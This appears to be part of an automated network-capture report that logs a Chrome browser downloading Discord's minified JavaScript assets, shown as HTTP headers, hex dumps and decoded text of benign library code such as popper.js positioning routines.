                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 79 28 74 29 2c 69 3d 30 3b 69 3c 74 3b 69 2b 2b 29 65 5b 69 5d 3d 74 68 69 73 2e 72 65 61 64 49 6e 74 31 36 28 29 3b 72 65 74 75 72 6e 20 65 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 55 69 6e 74 31 36 41 72 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 65 77 20 49 6e 74 31 36 41 72 72 61 79 28 74 29 2c 69 3d 30 3b 69 3c 74 3b 69 2b 2b 29 65 5b 69 5d 3d 74 68 69 73 2e 72 65 61 64 55 69 6e 74 31 36 28 29 3b 72 65 74 75 72 6e 20 65 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 55 69 6e 74 33 32 41 72 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 74 29 2c 69 3d 30 3b 69 3c 74 3b 69 2b 2b 29 65 5b 69 5d 3d 74 68 69 73 2e 72 65
                                                                          Data Ascii: y(t),i=0;i<t;i++)e[i]=this.readInt16();return e},a.prototype.readUint16Array=function(t){for(var e=new Int16Array(t),i=0;i<t;i++)e[i]=this.readUint16();return e},a.prototype.readUint32Array=function(t){for(var e=new Uint32Array(t),i=0;i<t;i++)e[i]=this.re
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 68 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 62 79 74 65 4c 65 6e 67 74 68 2d 74 68 69 73 2e 5f 62 79 74 65 4f 66 66 73 65 74 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2e 70 72 6f 74 6f 74 79 70 65 2c 22 62 75 66 66 65 72 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 72 69 6d 41 6c 6c 6f 63 28 29 2c 74 68 69 73 2e 5f 62 75 66 66 65 72 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 5f 62 75 66 66 65 72 3d 74 2c 74 68 69 73 2e 5f 64 61 74 61 56 69 65 77 3d 6e 65 77 20 44 61 74 61 56 69 65 77 28 74 68 69 73 2e 5f 62 75 66 66 65 72 2c 74 68 69 73 2e 5f 62 79 74 65 4f 66 66 73 65 74 29 2c 74 68 69 73
                                                                          Data Ascii: h",{get:function(){return this._byteLength-this._byteOffset}}),Object.defineProperty(o.prototype,"buffer",{get:function(){return this._trimAlloc(),this._buffer},set:function(t){this._buffer=t,this._dataView=new DataView(this._buffer,this._byteOffset),this
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 69 2e 62 79 74 65 4c 65 6e 67 74 68 2c 69 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 49 6e 74 31 36 41 72 72 61 79 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 3d 6e 75 6c 6c 3d 3d 74 3f 74 68 69 73 2e 62 79 74 65 4c 65 6e 67 74 68 2d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2f 32 3a 74 3b 76 61 72 20 69 3d 6e 65 77 20 49 6e 74 31 36 41 72 72 61 79 28 74 29 3b 72 65 74 75 72 6e 20 6f 2e 6d 65 6d 63 70 79 28 69 2e 62 75 66 66 65 72 2c 30 2c 74 68 69 73 2e 62 75 66 66 65 72 2c 74 68 69 73 2e 62 79 74 65 4f 66 66 73 65 74 2b 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2c 74 2a 69 2e 42 59 54 45 53 5f 50 45 52 5f 45 4c 45 4d 45 4e 54 29 2c 6f 2e 61 72 72 61 79 54 6f 4e 61 74 69 76 65 28 69 2c 6e 75 6c 6c 3d 3d 65
                                                                          Data Ascii: is.position+=i.byteLength,i},o.prototype.readInt16Array=function(t,e){t=null==t?this.byteLength-this.position/2:t;var i=new Int16Array(t);return o.memcpy(i.buffer,0,this.buffer,this.byteOffset+this.position,t*i.BYTES_PER_ELEMENT),o.arrayToNative(i,null==e
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 3f 74 68 69 73 2e 62 79 74 65 4c 65 6e 67 74 68 2d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2f 38 3a 74 3b 76 61 72 20 69 3d 6e 65 77 20 46 6c 6f 61 74 36 34 41 72 72 61 79 28 74 29 3b 72 65 74 75 72 6e 20 6f 2e 6d 65 6d 63 70 79 28 69 2e 62 75 66 66 65 72 2c 30 2c 74 68 69 73 2e 62 75 66 66 65 72 2c 74 68 69 73 2e 62 79 74 65 4f 66 66 73 65 74 2b 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2c 74 2a 69 2e 42 59 54 45 53 5f 50 45 52 5f 45 4c 45 4d 45 4e 54 29 2c 6f 2e 61 72 72 61 79 54 6f 4e 61 74 69 76 65 28 69 2c 6e 75 6c 6c 3d 3d 65 3f 74 68 69 73 2e 65 6e 64 69 61 6e 6e 65 73 73 3a 65 29 2c 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 69 2e 62 79 74 65 4c 65 6e 67 74 68 2c 69 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 46 6c 6f 61 74 33 32 41 72
                                                                          Data Ascii: t?this.byteLength-this.position/8:t;var i=new Float64Array(t);return o.memcpy(i.buffer,0,this.buffer,this.byteOffset+this.position,t*i.BYTES_PER_ELEMENT),o.arrayToNative(i,null==e?this.endianness:e),this.position+=i.byteLength,i},o.prototype.readFloat32Ar
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 34 2c 65 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 46 6c 6f 61 74 36 34 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 64 61 74 61 56 69 65 77 2e 67 65 74 46 6c 6f 61 74 36 34 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2c 6e 75 6c 6c 3d 3d 74 3f 74 68 69 73 2e 65 6e 64 69 61 6e 6e 65 73 73 3a 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 38 2c 65 7d 2c 6f 2e 65 6e 64 69 61 6e 6e 65 73 73 3d 6e 65 77 20 49 6e 74 38 41 72 72 61 79 28 6e 65 77 20 49 6e 74 31 36 41 72 72 61 79 28 5b 31 5d 29 2e 62 75 66 66 65 72 29 5b 30 5d 3e 30 2c 6f 2e 6d 65 6d 63 70 79 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 2c 73 2c 72 29 7b 76 61 72 20 6e 3d 6e 65 77 20 55 69
                                                                          Data Ascii: is.position+=4,e},o.prototype.readFloat64=function(t){var e=this._dataView.getFloat64(this.position,null==t?this.endianness:t);return this.position+=8,e},o.endianness=new Int8Array(new Int16Array([1]).buffer)[0]>0,o.memcpy=function(t,e,i,s,r){var n=new Ui
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 3d 65 26 26 28 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2b 3d 31 29 2c 6e 7d 3b 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 49 6e 74 36 34 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 74 68 69 73 2e 72 65 61 64 49 6e 74 33 32 28 29 2b 74 68 69 73 2e 72 65 61 64 55 69 6e 74 33 32 28 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 55 69 6e 74 36 34 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 74 68 69 73 2e 72 65 61 64 55 69 6e 74 33 32 28 29 2b 74 68 69 73 2e 72 65 61 64 55 69 6e 74 33 32 28 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 61 64 49 6e 74 36 34 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 74 68
                                                                          Data Ascii: =e&&(this.position+=1),n};o.prototype.readInt64=function(){return 4294967296*this.readInt32()+this.readUint32()},o.prototype.readUint64=function(){return 4294967296*this.readUint32()+this.readUint32()},o.prototype.readInt64=function(){return 4294967296*th


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          251192.168.2.549985162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:11 UTC866OUTGET /assets/65573.3d56d56002765d7a9da8.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iPV1oQiQt2oU29PR.swfFDIqezKDMluAOxho46Dsr7E-1702226711023-0-604800000
                                                                          2023-12-10 16:45:11 UTC1121INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 39 34 35 36 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 33 65 64 38 62 32 35 62 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 994569Connection: closeCF-Ray: 8336f4f3ed8b25b9-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 35 35 37 33 22 5d 2c 7b 37 39 38 35 32 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 70 6f 70 70 65 72 47 65 6e 65 72 61 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 7d 29 2c 6e 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 72 3d 6e 28 22 31 31 34 37 31 36 22 29 2c 61 3d 6e 28 22 33 31 36 34 34 22 29 2c 6f 3d 6e 28 22 34 30 33 34 36 38 22 29 2c 69 3d 6e 28 22 39 38 36 32 35 37 22 29 2c 73 3d 6e 28 22 33 39 34 34 34 32 22 29 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["65573"],{798526:function(e,t,n){"use strict";n.r(t),n.d(t,{popperGenerator:function(){return p}}),n("424973");var r=n("114716"),a=n("31644"),o=n("403468"),i=n("986257"),s=n("394442"),
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 61 6e 63 65 3a 67 2c 6f 70 74 69 6f 6e 73 3a 76 6f 69 64 20 30 3d 3d 3d 6e 3f 7b 7d 3a 6e 7d 29 3b 5f 2e 70 75 73 68 28 61 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 7d 7d 29 7d 28 29 2c 67 2e 75 70 64 61 74 65 28 29 7d 2c 66 6f 72 63 65 55 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 79 29 7b 76 61 72 20 65 3d 6d 2e 65 6c 65 6d 65 6e 74 73 2c 74 3d 65 2e 72 65 66 65 72 65 6e 63 65 2c 6e 3d 65 2e 70 6f 70 70 65 72 3b 69 66 28 66 28 74 2c 6e 29 29 7b 6d 2e 72 65 63 74 73 3d 7b 72 65 66 65 72 65 6e 63 65 3a 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 74 2c 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 6e 29 2c 22 66 69 78 65 64 22 3d 3d 3d 6d 2e 6f 70 74 69 6f 6e 73 2e 73 74 72 61 74 65 67 79 29 2c 70 6f 70 70 65 72 3a 28 30 2c 61 2e 64 65
                                                                          Data Ascii: tance:g,options:void 0===n?{}:n});_.push(a||function(){})}})}(),g.update()},forceUpdate:function(){if(!y){var e=m.elements,t=e.reference,n=e.popper;if(f(t,n)){m.rects={reference:(0,r.default)(t,(0,i.default)(n),"fixed"===m.options.strategy),popper:(0,a.de
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 7b 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 21 31 29 2c 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 21 31 29 3b 76 61 72 20 73 3d 65 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2c 75 3d 31 2c 6c 3d 31 3b 74 26 26 28 30 2c 72 2e 69 73 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 28 65 29 26 26 28 75 3d 65 2e 6f 66 66 73 65 74 57 69 64 74 68 3e 30 26 26 28 30 2c 61 2e 72 6f 75 6e 64 29 28 73 2e 77 69 64 74 68 29 2f 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 31 2c 6c 3d 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3e 30 26 26 28 30 2c 61 2e 72 6f 75 6e 64 29 28 73 2e 68 65 69 67 68 74 29 2f 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 31 29 3b 76 61 72 20 63 3d 28 28 30 2c 72 2e 69 73 45 6c 65 6d 65 6e 74 29 28 65 29 3f 28 30 2c 6f
                                                                          Data Ascii: {void 0===t&&(t=!1),void 0===n&&(n=!1);var s=e.getBoundingClientRect(),u=1,l=1;t&&(0,r.isHTMLElement)(e)&&(u=e.offsetWidth>0&&(0,a.round)(s.width)/e.offsetWidth||1,l=e.offsetHeight>0&&(0,a.round)(s.height)/e.offsetHeight||1);var c=((0,r.isElement)(e)?(0,o
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 63 2e 69 73 45 6c 65 6d 65 6e 74 29 28 65 29 26 26 28 30 2c 70 2e 64 65 66 61 75 6c 74 29 28 65 2c 75 29 26 26 22 62 6f 64 79 22 21 3d 3d 28 30 2c 6d 2e 64 65 66 61 75 6c 74 29 28 65 29 7d 29 3a 5b 5d 29 3a 5b 5d 2e 63 6f 6e 63 61 74 28 74 29 2c 5b 6e 5d 29 2c 68 3d 64 5b 30 5d 2c 67 3d 64 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 61 3d 79 28 65 2c 6e 2c 72 29 3b 72 65 74 75 72 6e 20 74 2e 74 6f 70 3d 28 30 2c 5f 2e 6d 61 78 29 28 61 2e 74 6f 70 2c 74 2e 74 6f 70 29 2c 74 2e 72 69 67 68 74 3d 28 30 2c 5f 2e 6d 69 6e 29 28 61 2e 72 69 67 68 74 2c 74 2e 72 69 67 68 74 29 2c 74 2e 62 6f 74 74 6f 6d 3d 28 30 2c 5f 2e 6d 69 6e 29 28 61 2e 62
                                                                          Data Ascii: filter(function(e){return(0,c.isElement)(e)&&(0,p.default)(e,u)&&"body"!==(0,m.default)(e)}):[]):[].concat(t),[n]),h=d[0],g=d.reduce(function(t,n){var a=y(e,n,r);return t.top=(0,_.max)(a.top,t.top),t.right=(0,_.min)(a.right,t.right),t.bottom=(0,_.min)(a.b
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 37 35 33 36 37 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 28 28 28 30 2c 72 2e 69 73 45 6c 65 6d 65 6e 74 29 28 65 29 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3a 65 2e 64 6f 63 75 6d 65 6e 74 29 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 7d 7d 2c 34 36 34 30 30 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75
                                                                          Data Ascii: {"use strict";n.r(t),n.d(t,{default:function(){return a}});var r=n("753671");function a(e){return(((0,r.isElement)(e)?e.ownerDocument:e.document)||window.document).documentElement}},464006:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){retu
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 35 31 36 39 32 35 22 29 2c 61 3d 6e 28 22 33 32 30 39 35 39 22 29 2c 6f 3d 6e 28 22 37 35 33 36 37 31 22 29 2c 69 3d 6e 28 22 32 39 38 37 32 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 65 29 26 26 28 30 2c 6f 2e 69 73 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 28 65 29 3f 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 65 29 3a 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 65 29 7d 7d 2c 39 38 36 32 35 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22
                                                                          Data Ascii: ion(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return s}});var r=n("516925"),a=n("320959"),o=n("753671"),i=n("298720");function s(e){return e!==(0,a.default)(e)&&(0,o.isHTMLElement)(e)?(0,i.default)(e):(0,r.default)(e)}},986257:function(e,t,n){"
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 22 31 39 30 34 31 38 22 29 2c 61 3d 6e 28 22 38 33 37 30 35 32 22 29 2c 6f 3d 6e 28 22 37 35 33 36 37 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 22 68 74 6d 6c 22 3d 3d 3d 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 65 29 3f 65 3a 65 2e 61 73 73 69 67 6e 65 64 53 6c 6f 74 7c 7c 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 28 28 30 2c 6f 2e 69 73 53 68 61 64 6f 77 52 6f 6f 74 29 28 65 29 3f 65 2e 68 6f 73 74 3a 6e 75 6c 6c 29 7c 7c 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 65 29 7d 7d 2c 38 39 35 31 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f
                                                                          Data Ascii: "190418"),a=n("837052"),o=n("753671");function i(e){return"html"===(0,r.default)(e)?e:e.assignedSlot||e.parentNode||((0,o.isShadowRoot)(e)?e.host:null)||(0,a.default)(e)}},895175:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return functio
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 31 33 30 36 37 30 22 29 2c 61 3d 6e 28 22 38 33 37 30 35 32 22 29 2c 6f 3d 6e 28 22 35 31 36 39 32 35 22 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 65 29 29 2e 6c 65 66 74 2b 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 65 29 2e 73 63 72 6f 6c 6c 4c 65 66 74 7d 7d 2c 37 35 33 36 37 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 69 73 48 54 4d 4c 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                                          Data Ascii: (){return i}});var r=n("130670"),a=n("837052"),o=n("516925");function i(e){return(0,r.default)((0,a.default)(e)).left+(0,o.default)(e).scrollLeft}},753671:function(e,t,n){"use strict";n.r(t),n.d(t,{isElement:function(){return a},isHTMLElement:function(){r
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 3f 76 6f 69 64 20 30 3a 73 2e 62 6f 64 79 29 2c 63 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 75 29 2c 64 3d 6c 3f 5b 63 5d 2e 63 6f 6e 63 61 74 28 63 2e 76 69 73 75 61 6c 56 69 65 77 70 6f 72 74 7c 7c 5b 5d 2c 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 75 29 3f 75 3a 5b 5d 29 3a 75 2c 66 3d 6e 2e 63 6f 6e 63 61 74 28 64 29 3b 72 65 74 75 72 6e 20 6c 3f 66 3a 66 2e 63 6f 6e 63 61 74 28 65 28 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 64 29 29 29 7d 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 22 38 39 35 31 37 35 22 29 2c 61 3d 6e 28 22 31 39 39 34 30 37 22 29 2c 6f 3d 6e 28 22 33 32 30 39 35 39 22 29 2c 69 3d 6e 28 22 37 39 30 39 37 33 22 29 7d 2c 36 39 37 33 30 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22
                                                                          Data Ascii: .ownerDocument)?void 0:s.body),c=(0,o.default)(u),d=l?[c].concat(c.visualViewport||[],(0,i.default)(u)?u:[]):u,f=n.concat(d);return l?f:f.concat(e((0,a.default)(d)))}}});var r=n("895175"),a=n("199407"),o=n("320959"),i=n("790973")},697309:function(e,t,n){"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          252192.168.2.549986162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:11 UTC866OUTGET /assets/14875.ab7170b144439cba21c6.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iPV1oQiQt2oU29PR.swfFDIqezKDMluAOxho46Dsr7E-1702226711023-0-604800000
                                                                          2023-12-10 16:45:11 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 33 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 34 34 39 62 62 37 34 33 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 14305Connection: closeCF-Ray: 8336f4f449bb7435-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
